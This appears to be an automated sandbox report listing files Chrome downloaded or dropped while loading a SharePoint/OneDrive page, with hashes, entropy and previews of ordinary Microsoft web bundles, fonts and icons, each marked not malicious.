                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_otellogging_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["otellogging"],{69691:function(n,t,e){var r=e(92855),i=e(41230),o=e(54800),u=e(59177),a=e(68128),c=e(78939),s=e(85788),f=e(69988),l=e(25855),d=function(n){function t(){var e=n.call(this)||this;return e.pluginVersionStringArr=[],(0,i.A)(t,e,(function(n,t){n.logger&&n.logger.queue||(n.logger=new o.wq({loggingLevelConsole:1})),n.initialize=function(e,r,i,s){(0,u.r2)(n,(function(){return"AppInsightsCore.initialize"}),(function(){var u=n.pluginVersionStringArr;if(e){e.endpointUrl||(e.endpointUrl=f.S);var l=e.propertyStorageOverride;!l||l.getProperty&&l.setProperty||(0,a.$8)("Invalid property storage override passed."),e.channels&&(0,a.Iu)(e.channels,(function(n){n&&(0,a.Iu)(n,
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (22120)
                                        Category:downloaded
                                        Size (bytes):56140
                                        Entropy (8bit):5.493962593030742
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:71126938B3D7C731959A8BDC32F1B558
                                        SHA1:B6415DC8634B9FBB76D74DEAFA2777571F6019CC
                                        SHA-256:38507CAC1E1D099702936D3A9A5EC3DCAE012198615881BC76E8A97FB2710BAD
                                        SHA-512:BF0DF511EA5F98F2F029B764B34A3E79ACC8A96EDE26818D97E85518678C688857FB8180380AF694826F869ECC398F2ED90B40E6A0B4CAE211B3D8359450F8B2
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/82.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[82],{4112:function(e,t,n){function a(e){return e&&e.webAbsoluteUrl===e.siteAbsoluteUrl}n.d(t,{a:function(){return a}})}.,3545:function(e,t,n){function a(e){var t=e.path,n=e.parentLink,a=e.filename,r=e.isContainer,o=e.shouldAllowDisplayFormUrl;if(!n||!a)return t;var s=t,c=i(n),d=r&&a&&t&&(t.indexOf(a)<0||t.indexOf(c)<0)&&-1===t.toLowerCase().indexOf("docsethome.aspx");return(!t||!o&&t.indexOf("/Forms/DispForm.aspx?ID=")>=0||d)&&(s="".concat(c,"/").concat(a)),s}function i(e){return e?e.replace(/\/Forms\/[^\/]*\.aspx$/i,"").replace(/\/[^\/]*\.aspx$/i,""):e}n.d(t,{a:function(){return i},b:function(){return a}})}.,7943:function(e,t,n){n.d(t,{a:function(){return C}});var a=n("tslib_102"),i=n(326),r=n(56),o=n("fui.util_369"),s=n(208),c=n("odsp.util_460"),d=n(996),l=n(1772),u=n(888),f=n(65),p=n(53),m=n(1496),_=n(10),h=n(54),b=["teams","sites","personal"],g="<scrubbed>",v="unknown";function y(e){if("/"===e.charAt(0)){
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows icon resource - 3 icons, 32x32, 32 bits/pixel, 24x24, 32 bits/pixel
                                        Category:downloaded
                                        Size (bytes):7886
                                        Entropy (8bit):3.1280056112498884
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:604ADFB53677B5CA4F910FFB131B3E7C
                                        SHA1:5F1A0FB4E4AD3707E591CE16352158263488ED70
                                        SHA-256:24638331466A52BB66F912090E7A9CC9E3DF2236E39C187C9409104526B472B0
                                        SHA-512:35F618F42ADFEE6D1335C67F729C298789419FE2930371A91683F60481794488DFAF15B572E6FC1BE70833EF12DFE57432725F6336B6B73DCFB52596F57F30A5
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://atlantarecyclingsolutions-my.sharepoint.com/_layouts/15/images/odbfavicon.ico?rev=47
                                        Preview:...... .... .....6......... ............... .h...f...(... ...@..... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(`.(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(..(p.....................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65474)
                                        Category:downloaded
                                        Size (bytes):727060
                                        Entropy (8bit):5.52559708123894
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9FDB71E1293EBD77F1827DA722DA8DD1
                                        SHA1:D6412BBA21225DB226E8214FF80EC46A82826883
                                        SHA-256:3A32592515544C2B8CEB9E698B989CB0EEB0C0316EC07AB12E01F1E71D321522
                                        SHA-512:D9A1B6260D7F72347FA853EDDFB9FAEF32375188933606E6289CD4646E2F067CD7EE84C4CFEEE30E1C08A4585E31277BBFD5B47FFA72F0F04613F8A9D98AE8F2
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/1353.js
                                        Preview:/*! For license information please see 1353.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1353],{6187:function(){!function(e){var t={};function n(a){if(t[a])return t[a].exports;var i=t[a]={i:a,l:!1,exports:{}};return e[a].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:a})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var a=Object.create(null);if(n.r(a),Object.defineProperty(a,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)n.d(a,i,function(t){return e[t]}.bind(null,i));return a},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (3095)
                                        Category:dropped
                                        Size (bytes):3100
                                        Entropy (8bit):5.043073882230498
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C6DD5B99104A2352170FC55903D74B48
                                        SHA1:B42A730AABF5D08A662A0DDEF597925EE6CC9398
                                        SHA-256:A7FFC93D1F6C24C1C86C3B2AF40E271B49CF54E82017CFC6EAD6A5F1D570D443
                                        SHA-512:E44E17BA118AA2A3570C4EC4D4B90BA23F4C9EB5E06F2D6851FB96BD14CCF5A4CE623FAE473E53CD92A46434A2D1DDC8F09DB8DAF57520717B8E4ED43861A140
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1875],{6738:function(e,t,n){n.r(t);var a=n("tslib_102"),i=n(8400),r=function(){function e(e){this._notificationHandlers=new Map,this._connectionHandlers=new Map,this._pushNotifyParams=e.pushNotifyParams}return e.prototype.isConnected=function(){var e;return!!(null===(e=this._pushNotify)||void 0===e?void 0:e.isConnected())},e.prototype.getSocketIoSubscription=function(){},e.prototype.addConnectionHandler=function(e,t){this._connectionHandlers.set(e,t)},e.prototype.removeConnectionHandler=function(e){this._connectionHandlers.delete(e)},e.prototype.setupNotificationHandler=function(e,t){var n=e.source,a=e.scenarios,r=e.id,o=void 0===r?"":r,s=i.b[n];if(s){if(a&&a.length)for(var c=0,d=a;c<d.length;c++){var l=d[c];this._notificationHandlers.set(s.toLowerCase()+i.a[l].toLowerCase()+o,t)}else this._notificationHandlers.set(s.toLowerCase()+o,t);return!0}return!1},e.prototype.connect=function(){return(0,a.Zd)(this,void
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (36614)
                                        Category:downloaded
                                        Size (bytes):59143
                                        Entropy (8bit):5.420813326584834
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4072019287D7BF65F279EC84B893F8A8
                                        SHA1:4E781638D9AC6424EE3CC711FC4DB0533C628CCB
                                        SHA-256:317E69F62603C6A465DA425F0C187923AB51A97B340D076D3151E883A4812AD1
                                        SHA-512:69656583E58EA1F7EE1D2DED8C2DF3AB5AFF925FCC10754F2377EBFF0B6307B61462F04F2481817A6998DF1308759DBBF71A8DBD86E70B7E3EAFE69032E64C6C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/133.js
                                        Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[133],{2681:function(e,t,n){"use strict";n.d(t,{a:function(){return o},b:function(){return I},c:function(){return O},d:function(){return p},e:function(){return s}});var a,i=n(2512),r=function(){function e(e){i.m.isNotNullOrUndefined(e,"id"),this._id=e}return e.create=function(t){return new e(t)},Object.defineProperty(e.prototype,"id",{get:function(){return this._id},enumerable:!1,configurable:!0}),e.prototype.isEmpty=function(){return 0===this._id.length},e}(),o=r,s=i.i.createCustom("sp-client-base:LogSource",function(e){return r.create("")}),c=function(){function e(e){if(this._head=-1,this._count=0,this._isIterating=!1,e<=0)throw new Error("Size must be positive");this._size=e,this._buffer=new Array(e)}return Object.defineProperty(e.prototype,"count",{get:function(){return this._count},enumerable:!1,configurable:!0}),e.prototype.push=function(e){this._ensureNotIterating(),this._head++,this._count++,this._head===this._size
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):14895
                                        Entropy (8bit):4.641843427673439
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:532D67159A4134064BCC921DF0DCCEB1
                                        SHA1:A3897B4D2EAC6CC78211FEA626899D61CCF28062
                                        SHA-256:8680D1CB15304BE7F4E0F12B63E2BBEF84E509607CEB7EF541BAC4695A729EFC
                                        SHA-512:2374014322F250CD4D047F365E91B3440917E24ADC0507902C73C1F8BDCD5058527572163BC927215B340352183160329E22D0D6B77794567E82F1985156B1BF
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/images/plt.sprite_422cd602.svg
                                        Preview:<?xml version="1.0" encoding="utf-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><symbol viewBox="0 0 20 20" id="AddRegular" xmlns="http://www.w3.org/2000/svg"><path d="M10 2.5a.5.5 0 0 0-1 0V9H2.5a.5.5 0 0 0 0 1H9v6.5a.5.5 0 0 0 1 0V10h6.5a.5.5 0 0 0 0-1H10V2.5Z"/></symbol><symbol viewBox="0 0 20 20" id="CalendarFilled" xmlns="http://www.w3.org/2000/svg"><path d="M5.5 3A2.5 2.5 0 0 0 3 5.5V6h14v-.5A2.5 2.5 0 0 0 14.5 3h-9ZM17 7H3v7.5A2.5 2.5 0 0 0 5.5 17h9a2.5 2.5 0 0 0 2.5-2.5V7Zm-9 3a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm-1 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm4-4a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm-1 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm4-4a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"/></symbol><symbol viewBox="0 0 20 20" id="CalendarRegular" xmlns="http://www.w3.org/2000/svg"><path d="M7 11a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm1 2a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm2-2a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm1 2a1 1 0 1 1-2 0 1 1 0 0 1 2 0Zm2-2a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm4-5.5A2.5 2.5 0 0 0 14.5 3h-9A2.5
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:troff or preprocessor input, ASCII text, with very long lines (372)
                                        Category:downloaded
                                        Size (bytes):37414
                                        Entropy (8bit):4.82325822639402
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C495654869785BC3DF60216616814AD1
                                        SHA1:0140952C64E3F2B74EF64E050F2FE86EAB6624C8
                                        SHA-256:36E0A7E08BEE65774168528938072C536437669C1B7458AC77976EC788E4439C
                                        SHA-512:E40F27C1D30E5AB4B3DB47C3B2373381489D50147C9623D853E5B299364FD65998F46E8E73B1E566FD79E97AA7B20354CD3C8C79F15372C147FED9C913FFB106
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css
                                        Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('../fonts/fontawesome-webfont.eot?v=4.7.0');. src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');. font-weight: normal;. font-style: normal;.}..fa {. display: inline-block;. font: normal normal normal 14px/1 FontAwesome;. font-size: inherit;. text-rendering: auto;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}./* makes the font 33% larger relative to the icon container */..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (45422)
                                        Category:downloaded
                                        Size (bytes):45452
                                        Entropy (8bit):5.401594446928274
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F3EBA5DB2461296A83A9193EB2745C3E
                                        SHA1:33EBFEB2AFB297730D95049C9ECD8013EE8E8657
                                        SHA-256:50CA1C9696B64F1F2EC30C6901D15D17C739F1BF022F349225ECCB71E97E694B
                                        SHA-512:2DA39E519DAB87F6C5B2CB864560029B4B2DADA143E6A3DD954C569EEBBC5EDA1F5393E42136E547E71E3C089649C06DEDFDB2AFD501FB89AC680EEC1E2CFEF0
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.utilities/fui.util-87c310c7.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.util"],{"fui.util_369":(e,t,n)=>{n.d(t,{Mh:()=>Wt,su:()=>ft,uq:()=>I,vm:()=>Ae,kb:()=>S,MR:()=>Re,wR:()=>v,dN:()=>Kt,P4:()=>y,qw:()=>vn,S9:()=>Z,mA:()=>$,N9:()=>je,so:()=>l,xD:()=>d,o7:()=>ee,K9:()=>A,fl:()=>X,hQ:()=>J,wX:()=>m,s9:()=>h,hU:()=>_,$Q:()=>P,UH:()=>Pt,fz:()=>le,Sx:()=>Bt,bg:()=>be,FX:()=>Ot,Vm:()=>St,rz:()=>Dt,pj:()=>he,dY:()=>An,aE:()=>Ne,vJ:()=>gn,KN:()=>Et,Gk:()=>fn,ri:()=>Xt,UT:()=>Zt,QA:()=>We,J1:()=>jt,oT:()=>Jt,yh:()=>It,B4:()=>_n,KL:()=>an,Cu:()=>fe,Ss:()=>p,TV:()=>ge,VI:()=>bn,XG:()=>g,DA:()=>$t,Kd:()=>tn,Gm:()=>hn,fy:()=>st,ZG:()=>tt,o3:()=>De,ti:()=>xe,zc:()=>we,vc:()=>en,k0:()=>nn,XB:()=>on,Es:()=>Yt,$o:()=>rn,OX:()=>C,Mr:()=>Fe,hw:()=>O,n6:()=>Ut,dU:()=>F,s5:()=>Qt,uX:()=>Se,e5:()=>f,gZ:()=>Tt,hh:()=>un,ni:()=>ln,Yx:()=>dn,Fg:()=>cn,f2:()=>sn,xw:()=>qt,kM:()=>U,Bv:()=>yt,JQ:()=>Rt,i3:()=>Ct,jB:()=>Ue,AZ:()=>Vt,Ww:()=>En,NS:()=>wn,sE:()=>Qe,J4:()=>qe,cA:()=>He,wY:()=>Pe,AN:()=>Gt
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (10401)
                                        Category:dropped
                                        Size (bytes):520176
                                        Entropy (8bit):5.031133177525619
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:29E09A3CA3CB3F1EF2F8B16B516DD2B4
                                        SHA1:98DAD9D5E615A63826AEF433A5F018FA946F800E
                                        SHA-256:17EC1DDD1062F6F3255C5ABB12850EC779BC782108A3BD0FC49175F053BFAD47
                                        SHA-512:B8DC2AC487580BE785E6CFCBA7415A3DA869E4727D6F8B54ECB43A83219A5C541B0402C568F245583D57BB31E744B18DF90A978B46AA43F85B32BF4EBD829A9B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx","deferred.resx"],{8303:function(e){e.exports=JSON.parse('{"needsPasswordLabel":"{0} requires a password.","enterPassword":"Enter password","enterPasswordDialogLabel":"Enter password to open this PDF file","invalidPasswordPrompt":"Incorrect password. Please try again.","dialogOk":"OK","dialogCancel":"Cancel","zoomPageFitSize":"Window size","zoomPageFitWidth":"Window width","previousPageTooltip":"Previous page","nextPageTooltip":"Next page","zoomTooltip":"Zoom","zoomOutTooltip":"Zoom out","zoomInTooltip":"Zoom in","rotateTooltip":"Rotate","openInNewWindowTooltip":"Open in new window","searchTooltip":"Search","previousTooltip":"Previous result","nextTooltip":"Next result","upCommandAria":"Go to the previous page.","downCommandAria":"Go to the next page.","zoomCommandAria":"Change the current zoom level. Press enter to open the option menu and esc to close it.","zoomOutCommandAria":"Zoom out the d
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):817232
                                        Entropy (8bit):6.521575466055739
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DA48E432FE61F451154F0715B2A7B174
                                        SHA1:51B6ADD0BBC4E0B5200B01DECA5D009F1DAF9F39
                                        SHA-256:65EA729083128DFCE1C00726BA932B91AAAF5E48736B5644DD37478E5F2875AC
                                        SHA-512:5AF9C1E43B52536272A575CA400A9EEE830A8FCECB83BB1A490515851BEF48957D8DE669B9F77B8614EB586838AF23385E1AFCE622EDB82A90EC7549F882D381
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .................................p...........9... W..Y.......|...................P................]......@...........?....A..S...`A..g....A..............P.......0".......W..icudt73l/brkitr/burmesedict.dict.icudt73l/brkitr/char.brk.icudt73l/brkitr/ja.res.icudt73l/brkitr/khmerdict.dict.icudt73l/brkitr/laodict.dict.icudt73l/brkitr/line_normal.brk.icudt73l/brkitr/line_normal_cj.brk.icudt73l/brkitr/res_index.res.icudt73l/brkitr/root.res.icudt73l/brkitr/thaidict.dict.icudt73l/brkitr/word.brk.icudt73l/brkitr/word_ja.brk.icudt73l/cnvalias.icu.icudt73l/curr/supplementalData.res.icudt73l/icustd.res.icudt73l/icuver.res.icudt73l/likelySubtags.res.icudt73l/nfkc.nrm.icudt73l/uemoji.icu.icudt73l/ulayout.icu.icudt73l/zone/tzdbNames.res...........'........Dict........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unic
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (25299)
                                        Category:downloaded
                                        Size (bytes):289524
                                        Entropy (8bit):5.4587654087686746
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D109895A35092CBB153870BBB7548F21
                                        SHA1:ABED27172DADE6509F377FACC638787EC2131CA1
                                        SHA-256:6B7A19C42F96C6D50BD72DA804937D1C007DE91DD92928A543B3A47E43460E15
                                        SHA-512:F00C0BCFBB159C73644DB41BF69A0FB53FDD0D28361F74D3AF94DF032BC60472BD8C9211A7FE5D92E0EFA4261ED3D44332612DDDAE50D10140A2240515606BF8
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/72.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[72,245,285,2097,2100,1226,1225,85],{4112:function(e,t,n){function a(e){return e&&e.webAbsoluteUrl===e.siteAbsoluteUrl}n.d(t,{a:function(){return a}})}.,5800:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(4112);function i(e){return!!e&&(0,a.a)(e)&&!!e.groupId&&!!e.isTeamsConnectedSite&&!e.isTeamsChannelSite}}.,5805:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("tslib_102"),i=n("react-lib"),r=n(1023),o=n(1583),s=n(1879),c={iconName:"FavoriteStar"},d={iconName:"FavoriteStarFill"};function l(e){var t;return(null===(t=e.actionState)||void 0===t?void 0:t.isToggled)?(0,a.W_)((0,a.W_)({},e),{iconProps:d,ariaLabel:s.d,title:s.d}):(0,a.W_)((0,a.W_)({},e),{iconProps:c,ariaLabel:s.a,title:s.a})}function u(e){return{key:r.a,iconOnly:!0,action:i.createElement(o.b,{itemKeys:[e]}),postProcess:l,automationId:"FieldRender-Followed"}}}.,5785:function(e,t,n){n.d(t,{a:function(){return s}});var a=n("react-lib")
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (22957)
                                        Category:downloaded
                                        Size (bytes):23153
                                        Entropy (8bit):5.476245457119104
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7B996267E7C6D1EC49CA08D87542EF01
                                        SHA1:8648524EDBD7DB690C72D7F03D3C63A9D1BD4D10
                                        SHA-256:3ACF36429FC2206DFB46829D22C5305FFF23CB6478AF6B098FF46DD7892270A8
                                        SHA-512:1D46449B9EFCEBC2A8DC368459376AB63DC5A7257743D890F0ADBB71D0F86E2EE18767BC3A02046AFE92A813236D59419325784480CF00F23A62D86E08971638
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/279.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[279],{2254:function(e,t,n){n.r(t),n.d(t,{FloodgateDataSource:function(){return X},resourceKey:function(){return Z}});var a={};n.r(a),n.d(a,{AllPhotosFPSSurvey:function(){return M},NPSCampaignDebugForSPO:function(){return w},NPSCampaignDebugForSPOSharedialog:function(){return E},NPSCampaignDogfood:function(){return D},NPSCampaignForLists:function(){return p.b},NPSCampaignForListsDebug:function(){return p.a},NPSCampaignForSPO:function(){return A},NPSCampaignForSPOSharedialog:function(){return L},NPSCampaignForceNomination:function(){return I},NPSCampaignProd:function(){return S},NPSSuiteSurvey:function(){return k},NlqsSurveyForBigLangs:function(){return H},NlqsSurveyForMediumLangs:function(){return R},NlqsSurveyForSmallLangs:function(){return B},ODBCopyFPSSurvey:function(){return T},ODBMoveFPSSurvey:function(){return P},ODCCopyFPSSurvey:function(){return F},ODCMoveFPSSurvey:function(){return U},ODNPSCampaignDog
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (32700)
                                        Category:dropped
                                        Size (bytes):34880
                                        Entropy (8bit):5.377706580353428
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:39E764697808653DF46F51D1393C2DDD
                                        SHA1:3C681764D21A252F9429D4EDDA7A66EA3ABA8A98
                                        SHA-256:267C51453EF766CD2331F2E16D5504B8CE714BE81E683EE88D0ECF148CFDBD06
                                        SHA-512:C3905F48548B9CB4B035A350473185CBA828D9D858184E6FC798D50610E84DAD5F73C4DC2F5D8DAC9A515472594C7D158D41DA414AB6CDC4C513C7A6018FCE14
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[62],{5933:function(e,t){var n=function(){function e(){this.R=0,this.G=0,this.B=0,this.A=e.maxComponent}return e.clone=function(t){return e.fromRgba(t.R,t.G,t.B,t.A)},e.equals=function(e,t){var n=!e,a=!t;return n||a?n&&a:e.R===t.R&&e.G===t.G&&e.B===t.B&&e.A===t.A},e.fromRgba=function(t,n,a,i){var r=new e;return r.R=Math.round(t),r.G=Math.round(n),r.B=Math.round(a),r.A=null!=i?Math.round(i):e.maxComponent,r},e.fromRgbaString=function(t){var n=new e;if(/^rgb.+/.test(t)){var a=t.match(/[\d.]+/g);n=e.fromRgba(Number(a[0]),Number(a[1]),Number(a[2]),4===a.length?Number(a[3])*e.maxComponent:null)}return n},e.fromHtmlColor=function(t){function n(e,t,n){return parseInt(e.charAt(t)+e.charAt(n),16)}var a=new e;if("string"==typeof t&&"#"===t.charAt(0))switch(t.length){case 9:a.A=n(t,1,2),a.R=n(t,3,4),a.G=n(t,5,6),a.B=n(t,7,8);break;case 7:a.R=n(t,1,2),a.G=n(t,3,4),a.B=n(t,5,6);break;case 4:a.R=n(t,1,1),a.G=n(t,2,2),a.B=n(
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (42754)
                                        Category:downloaded
                                        Size (bytes):42785
                                        Entropy (8bit):5.2584724077065434
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:55C73223009BCBCE20C0E7C97286B69E
                                        SHA1:E26B1DD7E1D762023BC681D19D14A204C8EEF98B
                                        SHA-256:9CC94E74E77FD0409CBFD8A0AC257819D16E7833B44334285193D79817A2D729
                                        SHA-512:6D7E53F453BCC90CF1BE359E5D7ED422541E25ADCA7B206E83D8E19AC081719B9D40BBFCFC0DF5FD71F2A2775423303FA34703852138549CC572A4AE54EFA6B4
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.utilities/odsp.util-31d1b813.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.util"],{"odsp.util_460":function(e,t,n){function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.d(t,{S7:function(){return gt},vh:function(){return vt},UV:function(){return Ke},EI:function(){return Ke},Bj:function(){return zt},k0:function(){return Je},us:function(){return $e},Z3:function(){return Ze},t_:function(){return yt},Kh:function(){return Ve},JW:function(){return Y},bJ:function(){return _},c2:function(){return Q},rx:function(){return m},m2:function(){return Ct},g8:function(){return q},Yv:function(){return p},et:function(){return r},_Q:function(){return Kt},z8:function(){return Pt},K9:function(){return T},HW:function(){return T},Q6:function(){return at},bL:function(){return un},bx:function(){return St},fP:function(){return Dt},k:function(){return xt},cX:function(){retu
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (41517)
                                        Category:downloaded
                                        Size (bytes):145425
                                        Entropy (8bit):5.560042416992004
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:63C5F0E2FE9D26E098690C714FB82D1B
                                        SHA1:CF9CF95757E054960E52E316BDA28749B74F3CEC
                                        SHA-256:9E11CB1FDFF799046A68FEAE76B9913E009CE9C606C721C3A2065B066DBD000C
                                        SHA-512:C0FC3C2BA36A06985C6719EEBC5B7F3DC39B681A90B58CE3BF620A1EFFB31DDA8623E0B3129FD41EB9DAC400650A7554526B7A9380FBE4E455C0104977D97971
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://shell.cdn.office.net/api/ShellBootstrapper/business/OneShell
                                        Preview://BuildVersion 1.20240906.4.0.var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_bootstrapper_start"),function(){var e,t,n,a,r={7695:function(e){e.exports="data:font/woff;charset=utf-8;base64,d09GRgABAAAAAAmoAA4AAAAAExwAA5R8AAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABRAAAAEgAAABgMWd7ZGNtYXAAAAGMAAAAPQAAAVLnkt3NY3Z0IAAAAcwAAAAgAAAAKgnZCa9mcGdtAAAB7AAAAPAAAAFZ/J7mjmdhc3AAAALcAAAADAAAAAwACAAbZ2x5ZgAAAugAAAGhAAADZMkacS9oZWFkAAAEjAAAADIAAAA2AQjyc2hoZWEAAATAAAAAFQAAACQQAQgDaG10eAAABNgAAAAMAAAADA0qASZsb2NhAAAE5AAAAAoAAAAKAiQA2G1heHAAAATwAAAAHQAAACAAIgIObmFtZQAABRAAAAP4AAAJ+pGb8VNwb3N0AAAJCAAAABQAAAAg/1EAe3ByZXAAAAkcAAAAiQAAANN4vfIOeJxjYGH3YpzAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eKXx5wgPkQkgGsjgXCU2BgAADOIQhyeJxjYGBgZoBgGQZGBhDwAfIYwXwWBgMgzQGETAwMzxWfV3958P8/giXxUKKNWxmqCwwY2RhGPAAA9FQPGwAAAHicY9BiCGUoYGhgWMXIwNjA7MB4gMEBiwgQAACqHAeVeJxdj79Ow0AM
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format, TrueType, length 15908, version 1.3277
                                        Category:downloaded
                                        Size (bytes):15908
